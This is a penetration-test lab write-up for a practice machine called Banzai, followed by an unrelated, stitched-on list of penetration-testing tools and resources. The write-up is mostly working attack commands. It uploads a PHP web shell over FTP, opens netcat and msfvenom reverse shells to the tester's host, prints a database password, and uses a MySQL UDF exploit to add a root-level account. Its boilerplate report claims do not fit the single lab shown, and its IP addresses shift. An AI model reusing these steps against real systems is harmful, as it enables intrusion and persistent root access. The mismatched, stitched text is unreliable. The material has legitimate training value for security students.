# Nmap done at Fri Aug 6 07:59:30 2021 -- 1 IP address (1 host up) scanned in 19.73 seconds
```
### Operating System
```bash
# Nmap 7.91 scan initiated Fri Aug 6 08:01:07 2021 as: nmap -O -oN scans/banzai-nmap-os 192.168.166.56
Nmap scan report for 192.168.166.56
Host is up (0.11s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
5432/tcp open postgresql
8080/tcp open http-proxy
Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%), IPFire 2.11 firewall (Linux 2.6.32) (87%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 6 08:01:22 2021 -- 1 IP address (1 host up) scanned in 15.23 seconds
```
## Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
### FTP
Found the username "admin" via smtp-enum-users. It works when logging in via FTP.
```bash
ftp 192.168.114.56 21 # admin:admin
```
### SMTP
```bash
# Nmap 7.91 scan initiated Sat Aug 7 12:38:14 2021 as: nmap -p25 --script smtp-commands -oN scans/banzai-nmap-scripts-smtp-commands 192.168.114.56
Nmap scan report for 192.168.114.56
Host is up (0.072s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
# Nmap done at Sat Aug 7 12:38:15 2021 -- 1 IP address (1 host up) scanned in 1.50 seconds
```
```bash
# Nmap 7.91 scan initiated Sat Aug 7 12:39:10 2021 as: nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.methods=VRFY -oN scans/banzai-nmap-scripts-smtp-enum-users 192.168.114.56 smtp-enum-users.methods=EXPN smtp-enum-users.methods=RCPT
Failed to resolve "smtp-enum-users.methods=EXPN".
Failed to resolve "smtp-enum-users.methods=RCPT".
Failed to resolve "smtp-enum-users.methods=RCPT".
Nmap scan report for 192.168.114.56
Host is up (0.099s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
Failed to resolve "smtp-enum-users.methods=RCPT".
# Nmap done at Sat Aug 7 12:39:12 2021 -- 1 IP address (1 host up) scanned in 1.25 seconds
```
```bash
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Sat Aug 7 13:16:44 2021 #########
192.168.114.56: admin exists
192.168.114.56: _apt exists
192.168.114.56: backup exists
192.168.114.56: bin exists
192.168.114.56: daemon exists
192.168.114.56: ftp exists
192.168.114.56: games exists
192.168.114.56: gnats exists
192.168.114.56: irc exists
192.168.114.56: lp exists
192.168.114.56: list exists
192.168.114.56: mail exists
192.168.114.56: messagebus exists
192.168.114.56: man exists
192.168.114.56: news exists
192.168.114.56: mysql exists
192.168.114.56: nobody exists
192.168.114.56: postfix exists
192.168.114.56: postmaster exists
192.168.114.56: proxy exists
192.168.114.56: postgres exists
192.168.114.56: root exists
192.168.114.56: ROOT exists
192.168.114.56: sshd exists
192.168.114.56: sync exists
192.168.114.56: sys exists
192.168.114.56: systemd-network exists
192.168.114.56: systemd-bus-proxy exists
192.168.114.56: systemd-resolve exists
192.168.114.56: systemd-timesync exists
192.168.114.56: uucp exists
192.168.114.56: www exists
192.168.114.56: webmaster exists
192.168.114.56: www-data exists
######## Scan completed at Sat Aug 7 13:16:54 2021 #########
34 results.
168 queries in 10 seconds (16.8 queries / sec)
```
### HTTP (TCP Port 8295)
```bash
dirb http://192.168.166.56:8295 -o scans/banzai-dirb-common-8295
# output
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: scans/banzai-dirb-common-8295
START_TIME: Fri Aug 6 08:05:45 2021
URL_BASE: http://192.168.166.56:8295/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.166.56:8295/ ----
==> DIRECTORY: http://192.168.166.56:8295/css/
==> DIRECTORY: http://192.168.166.56:8295/img/
+ http://192.168.166.56:8295/index.php (CODE:200|SIZE:23315)
==> DIRECTORY: http://192.168.166.56:8295/js/
==> DIRECTORY: http://192.168.166.56:8295/lib/
+ http://192.168.166.56:8295/server-status (CODE:403|SIZE:281)
---- Entering directory: http://192.168.166.56:8295/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.166.56:8295/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.166.56:8295/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.166.56:8295/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Aug 6 08:14:26 2021
DOWNLOADED: 4612 - FOUND: 2
```
```bash
# Dirsearch started Fri Aug 6 23:55:22 2021 as: dirsearch.py -u http://192.168.166.56:8295 -o /home/victor/oscp/pg/labs/banzai/scans/banzai-dirsearch-8295
301 320B http://192.168.166.56:8295/js -> REDIRECTS TO: http://192.168.166.56:8295/js/
301 321B http://192.168.166.56:8295/css -> REDIRECTS TO: http://192.168.166.56:8295/css/
301 321B http://192.168.166.56:8295/img -> REDIRECTS TO: http://192.168.166.56:8295/img/
200 23KB http://192.168.166.56:8295/index.php
200 23KB http://192.168.166.56:8295/index.php/login/
200 932B http://192.168.166.56:8295/js/
301 321B http://192.168.166.56:8295/lib -> REDIRECTS TO: http://192.168.166.56:8295/lib/
200 2KB http://192.168.166.56:8295/lib/
```
```bash
nikto -h 192.168.114.56 -p 8295 -T 2 -Format txt -o scans/banzai-nikto-8295-misconfig
# output
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.114.56
+ Target Port: 8295
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ HEAD Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ FHZYCXES Web Server returns a valid response with junk HTTP methods, this may cause false positives.
```
## Gaining Access
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, Victor was able to successfully gain access to 10 out of the 50 systems.
```bash
ftp 192.168.114.56 21 # admin:admin
ls
# output
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 0 4096 May 26 2020 contactform
drwxr-xr-x 2 1001 0 4096 May 26 2020 css
drwxr-xr-x 3 1001 0 4096 May 26 2020 img
-rw-r--r-- 1 1001 0 23364 May 27 2020 index.php
drwxr-xr-x 2 1001 0 4096 May 26 2020 js
drwxr-xr-x 11 1001 0 4096 May 26 2020 lib
226 Directory send OK.
exit
```
```bash
vim cmd.php
<?php echo shell_exec($_GET['cmd']); ?>
```
```bash
ftp 192.168.114.56 21 # admin:admin
put cmd.php
exit
```
```bash
curl "http://192.168.114.56:8295/cmd.php?cmd=whoami"
curl "http://192.168.114.56:8295/cmd.php?cmd=which%20nc"
```
I was able to get an initial shell, but knew I needed to upgrade my shell. The next steps I took where to upload a better one using Msfvenom and FTP.
```bash
sudo nc -nvlp 8295
curl "http://192.168.114.56:8295/cmd.php?cmd=nc%20192.168.49.114%208295%20-e%20%27%2Fbin%2Fbash%27"
```
## Maintaining Access
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already per-formed the exploit. Victor added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to en-sure that additional access could be established.
### Privilege Escalation
```bash
python -c "import pty; pty.spawn('/bin/bash');"
whoami
# output
www-data
```
```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.114 LPORT=21 -f elf -o rshell.elf
ftp 192.168.114.56 21 # admin:admin
put rshell.elf
exit
sudo nc -nvlp 21 # setup a netcat listener on TCP port 21
```
```bash
curl "http://192.168.114.56:8295/cmd.php?cmd=file%20rshell.elf" # confirm rshell is in relative path
curl "http://192.168.114.56:8295/cmd.php?cmd=mv%20rshell.elf%20/tmp" # confirm rshell is in relative path
curl "http://192.168.114.56:8295/cmd.php?cmd=chmod%20+x%20/tmp/rshell.elf" # make rshell executable
curl "http://192.168.114.56:8295/cmd.php?cmd=/tmp/rshell.elf" # execute rshell
```
```bash
uname -a
# output
Linux banzai 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux
```
```bash
cat /etc/passwd | grep bash
# output
root:x:0:0:root:/root:/bin/bash
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
```
```bash
find / -perm -u=s -type f 2> /dev/null
# output
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
```
```bash
cat /etc/crontab
# output
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
```
```bash
cat /var/www/config.php
# output
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>
```
```bash
# attacker side
cd exploits
searchsploit linux mysql
mkdir edb-id-1518
cd edb-id-1518
searchsploit -m 1518
mv 1518.c pwn.c
gcc -g -c pwn.c
gcc -g -shared -Wl,-soname,pwn.so -o pwn.so pwn.o -lc
ftp 192.168.114.56 21
put pwn.so
exit
```
```bash
# target side
mysql -u root -p # EscalateRaftHubris123
use mysql;
create table PWN(line blob);
insert into PWN values(load_file('/var/www/html/pwn.so'));
select * from PWN into dumpfile '/usr/lib/mysql/plugin/pwn.so';
# if the cmd above does not work, trying copying it manually
create function do_system returns integer soname 'pwn.so';
# https://www.root-me.org/?page=forum&id_thread=5072
select * from mysql.func;
```
```bash
# attacker side
sudo tcpdump -i tun0 icmp
```
```bash
# target side
select do_system('ping -c3 192.168.49.114');
select do_system('useradd -p $(openssl passwd -crypt password) -s /bin/bash -o -u 0 -g 0 victor');
exit;
tail -n1 /etc/passwd
su victor # password
id
# output
uid=0(root) gid=0(root) groups=0(root)
```
|
### **Awesome Penetration Testing** [![Links Check](https://4.bp.blogspot.com/-_NIGc5XKpSw/WHt9d7wCXaI/AAAAAAAAB0o/OYIv8EWjIoYh44jfxIRSrRYbgrn3MZKEQCLcB/s1600/penetration%2Btesting.png)](http://kalitut.com)
[![10 Common Hacking Techniques](http://img.youtube.com/vi/V3CTfJ2ZP7M/0.jpg)](http://www.youtube.com/watch?v=V3CTfJ2ZP7M "10 Common Hacking Techniques")
A collection of awesome penetration testing resources
- [Online Resources](#online-resources)
- [Penetration Testing Resources](#penetration-testing-resources)
- [Exploit development](#exploit-development)
- [Social Engineering Resources](#social-engineering-resources)
- [Lock Picking Resources](#lock-picking-resources)
- [Tools](#tools)
- [Penetration Testing Distributions](#penetration-testing-distributions)
- [Basic Penetration Testing Tools](#basic-penetration-testing-tools)
- [Docker for Penetration Testing](#docker-for-penetration-testing)
- [Vulnerability Scanners](#vulnerability-scanners)
- [Network Tools](#network-tools)
- [Wireless Network Tools](#wireless-network-tools)
- [SSL Analysis Tools](#ssl-analysis-tools)
- [Web exploitation](#web-exploitation)
- [Hex Editors](#hex-editors)
- [Crackers](#crackers)
- [Windows Utils](#windows-utils)
- [Linux Utils](#linux-utils)
- [DDoS Tools](#ddos-tools)
- [Social Engineering Tools](#social-engineering-tools)
- [OSInt Tools](#osint-tools)
- [Anonymity Tools](#anonymity-tools)
- [Reverse Engineering Tools](#reverse-engineering-tools)
- [CTF Tools](#ctf-tools)
- [Books](#books)
- [Penetration Testing Books](#penetration-testing-books)
- [Hackers Handbook Series](#hackers-handbook-series)
- [Defensive Development](#defensive-development)
- [Network Analysis Books](#network-analysis-books)
- [Reverse Engineering Books](#reverse-engineering-books)
- [Malware Analysis Books](#malware-analysis-books)
- [Windows Books](#windows-books)
- [Social Engineering Books](#social-engineering-books)
- [Lock Picking Books](#lock-picking-books)
- [Vulnerability Databases](#vulnerability-databases)
- [Security Courses](#security-courses)
- [Information Security Conferences](#information-security-conferences)
- [Information Security Magazines](#information-security-magazines)
### Online Resources
#### Penetration Testing Resources
* [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course
* [PTES](http://www.pentest-standard.org/) - Penetration Testing Execution Standard
* [OWASP](https://www.owasp.org/index.php/Main_Page) - Open Web Application Security Project
* [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - A free online security knowledge library for pentesters / researchers.
* [Vulnerability Assessment Framework](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Penetration Testing Framework.
* [The Pentesters Framework](https://github.com/trustedsec/ptf) - PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used.
#### Exploit development
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode
* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits
* [shellsploit](https://github.com/b3mb4m/shellsploit-framework) - New Generation Exploit Development Kit
* [Voltron](https://github.com/snare/voltron) - A hacky debugger UI for hackers
#### Social Engineering Resources
* [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - An information resource for social engineers
#### Lock Picking Resources
* [Schuyler Towne channel](https://www.youtube.com/user/SchuylerTowne/) - Lockpicking videos and security talks
* [/r/lockpicking](https://www.reddit.com/r/lockpicking) - Resources for learning lockpicking, equipment recommendations.
### Tools
#### Penetration Testing Distributions
* [Kali](https://www.kali.org/) - A Linux distribution designed for digital forensics and penetration testing
* [ArchStrike](https://archstrike.org/) - An Arch Linux repository for security professionals and enthusiasts
* [BlackArch](https://www.blackarch.org/) - Arch Linux-based distribution for penetration testers and security researchers
* [NST](http://networksecuritytoolkit.org/) - Network Security Toolkit distribution
* [Pentoo](http://www.pentoo.ch/) - Security-focused livecd based on Gentoo
* [BackBox](https://backbox.org/) - Ubuntu-based distribution for penetration tests and security assessments
* [Parrot](https://www.parrotsec.org/) - A distribution similar to Kali, with multiple architecture
* [Fedora Security Lab](https://labs.fedoraproject.org/en/security/) - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
#### Basic Penetration Testing Tools
* [Metasploit Framework](https://www.metasploit.com/) - World's most used penetration testing software
* [Burp Suite](https://portswigger.net/burp/) - An integrated platform for performing security testing of web applications
* [ExploitPack](http://exploitpack.com/) - Graphical tool for penetration testing with a bunch of exploits
* [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project
* [faraday](https://github.com/infobyte/faraday) - Collaborative Penetration Test and Vulnerability Management Platform
* [evilgrade](https://github.com/infobyte/evilgrade) - The update explotation framework
* [commix](https://github.com/stasinopoulos/commix) - Automated All-in-One OS Command Injection and Exploitation Tool
* [routersploit](https://github.com/reverse-shell/routersploit) - Automated penetration testing software for router
* [redsnarf] (https://github.com/nccgroup/redsnarf) - Post-exploitation tool for grabbing credentials
#### Docker for Penetration Testing
* `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/)
* `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy)
* `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)
* `docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/)
* `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/)
* `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/)
* `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/)
* `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/)
* `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)
* `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/)
* `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)
* `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)
* `docker-compose build && docker-compose up` - [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)
* `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)
* `docker pull bkimminich/juice-shop` - [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--)
#### Vulnerability Scanners
* [Nexpose](https://www.rapid7.com/products/nexpose/) - Vulnerability Management & Risk Management Software
* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) - Vulnerability, configuration, and compliance assessment
* [Nikto](https://cirt.net/nikto2) - Web application vulnerability scanner
* [OpenVAS](http://www.openvas.org/) - Open Source vulnerability scanner and manager
* [OWASP Zed Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - Penetration testing tool for web applications
* [Secapps](https://secapps.com/) - Integrated web application security testing environment
* [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework
* [Wapiti](http://wapiti.sourceforge.net/) - Web application vulnerability scanner
* [WebReaver](http://www.webreaver.com/) - Web application vulnerability scanner for Mac OS X
* [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR
* [arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework
#### Network Tools
* [nmap](https://nmap.org/) - Free Security Scanner For Network Exploration & Security Audits
* [pig](https://github.com/rafael-santiago/pig) - A Linux packet crafting tool
* [tcpdump/libpcap](http://www.tcpdump.org/) - A common packet analyzer that runs under the command line
* [Wireshark](https://www.wireshark.org/) - A network protocol analyzer for Unix and Windows
* [Network Tools](http://network-tools.com/) - Different network tools: ping, lookup, whois, etc
* [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - A Swiss army knife for for network sniffing
* [Intercepter-NG](http://sniff.su/) - a multifunctional network toolkit
* [SPARTA](http://sparta.secforce.com/) - Network Infrastructure Penetration Testing Tool
* [dnschef](http://thesprawl.org/projects/dnschef/) - A highly configurable DNS proxy for pentesters
* [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service
* [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results
* [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper
* [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS Enumeration Script
* [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers
* [passivedns-client](https://github.com/chrislee35/passivedns-client) - Provides a library and a query tool for querying several passive DNS providers
* [passivedns](https://github.com/gamelinux/passivedns) - A network sniffer that logs all DNS server replies for use in a passive DNS setup
* [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
* [Zarp](https://github.com/hatRiot/zarp) - Zarp is a network attack tool centered around the exploitation of local networks
* [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers
* [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH
* [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols
* [DET](https://github.com/sensepost/DET) - DET is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time
* [pwnat](https://github.com/samyk/pwnat) - punches holes in firewalls and NATs
* [dsniff](https://www.monkey.org/~dugsong/dsniff/) - a collection of tools for network auditing and pentesting
* [tgcd](http://tgcd.sourceforge.net/) - a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls
* [smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool
* [scapy](https://github.com/secdev/scapy) - a python-based interactive packet manipulation program & library
* [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework
* [Debookee (MAC OS X)](http://www.iwaxx.com/debookee/) - Intercept traffic from any device on your network
* [Dripcap](https://github.com/dripcap/dripcap) - Caffeinated packet analyzer
#### Wireless Network Tools
* [Aircrack-ng](http://www.aircrack-ng.org/) - a set of tools for auditing wireless network
* [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS
* [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against Wifi Protected Setup
* [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool
* [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against Wi-Fi networks
#### SSL Analysis Tools
* [SSLyze](https://github.com/nabla-c0d3/sslyze) - SSL configuration scanner
* [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - a demonstration of the HTTPS stripping attacks
* [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS
* [tls_prober](https://github.com/WestpointLtd/tls_prober) - fingerprint a server's SSL/TLS implementation
#### Web exploitation
* [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner
* [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool
* [weevely3](https://github.com/epinna/weevely3) - Weaponized web shell
* [Wappalyzer](https://wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites
* [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
* [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla CMS scanner
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website Fingerprinter
* [BlindElephant](http://blindelephant.sourceforge.net/) - Web Application Fingerprinter
* [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even google automatically for LFI/RFI bugs
* [Kadabra](https://github.com/D35m0nd142/Kadabra) - Automatic LFI exploiter and scanner
* [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool
* [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool
#### Hex Editors
* [HexEdit.js](https://hexed.it) - Browser-based hex editing
* [Hexinator](https://hexinator.com/) (commercial) - World's finest Hex Editor
* [HxD - Freeware Hex Editor and Disk Editor](https://mh-nexus.de/en/hxd/)
#### Crackers
* [John the Ripper](http://www.openwall.com/john/) - Fast password cracker
* [Online MD5 cracker](http://www.md5crack.com/) - Online MD5 hash Cracker
* [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker
* [THC Hydra](http://sectools.org/tool/hydra/) - Another Great Password Cracker
#### Windows Utils
* [Sysinternals Suite](https://technet.microsoft.com/en-us/sysinternals/bb842062) - The Sysinternals Troubleshooting Utilities
* [Windows Credentials Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/) - security tool to list logon sessions and add, change, list and delete associated credentials
* [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows OS
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework
* [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target
* [Responder](https://github.com/SpiderLabs/Responder) - A LLMNR, NBT-NS and MDNS poisoner
* [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - A graphical Active Directory trust relationship explorer
* [Empire](https://github.com/PowerShellEmpire/Empire) - Empire is a pure PowerShell post-exploitation agent
* [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel
#### Linux Utils
* [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Linux Exploit Suggester; based on operating system release number.
#### DDoS Tools
* [LOIC](https://github.com/NewEraCracker/LOIC/) - An open source network stress tool for Windows
* [JS LOIC](http://metacortexsecurity.com/tools/anon/LOIC/LOICv1.html) - JavaScript in-browser version of LOIC
* [T50](https://sourceforge.net/projects/t50/) - The more fast network stress tool
#### Social Engineering Tools
* [SET](https://github.com/trustedsec/social-engineer-toolkit) - The Social-Engineer Toolkit from TrustedSec
#### OSInt Tools
* [Maltego](http://www.paterva.com/web7/) - Proprietary software for open source intelligence and forensics, from Paterva.
* [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester
* [creepy](https://github.com/ilektrojohn/creepy) - A geolocation OSINT tool
* [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester
* [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - a database of Google dorks; can be used for recon
* [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans
* [Shodan](https://www.shodan.io/) - Shodan is the world's first search engine for Internet-connected devices
* [recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) - A full-featured Web Reconnaissance framework written in Python
* [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan github repos/organizations for potential sensitive information leak
* [vcsmap](https://github.com/melvinsh/vcsmap) - A plugin-based tool to scan public version control systems for sensitive information
* [Spiderfoot](http://www.spiderfoot.net/) - multi-source OSINT automation tool with a Web UI and report visualizations
#### Anonymity Tools
* [Tor](https://www.torproject.org/) - The free software for enabling onion routing online anonymity
* [I2P](https://geti2p.net/en/) - The Invisible Internet Project
* [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network.
#### Reverse Engineering Tools
* [IDA Pro](https://www.hex-rays.com/products/ida/) - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
* [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml) - The freeware version of IDA v5.0
* [WDK/WinDbg](https://msdn.microsoft.com/en-us/windows/hardware/hh852365.aspx) - Windows Driver Kit and WinDbg
* [OllyDbg](http://www.ollydbg.de/) - An x86 debugger that emphasizes binary code analysis
* [Radare2](http://rada.re/r/index.html) - Opensource, crossplatform reverse engineering framework
* [x64_dbg](http://x64dbg.com/) - An open-source x64/x32 debugger for windows
* [Immunity Debugger](http://debugger.immunityinc.com/) - A powerful new way to write exploits and analyze malware
* [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for Linux
* [Medusa disassembler](https://github.com/wisk/medusa) - An open source interactive disassembler
* [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code
* [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB
* [dnSpy](https://github.com/0xd4d/dnSpy) - dnSpy is a tool to reverse engineer .NET assemblies
#### CTF Tools
* [Pwntools](https://github.com/Gallopsled/pwntools) - CTF framework for use in CTFs
### Books
#### Penetration Testing Books
* [The Art of Exploitation by Jon Erickson, 2008](http://amzn.to/2iqhK9S)
* [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](http://amzn.to/2jl5pUd)
* [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](http://amzn.to/2jMfK8i)
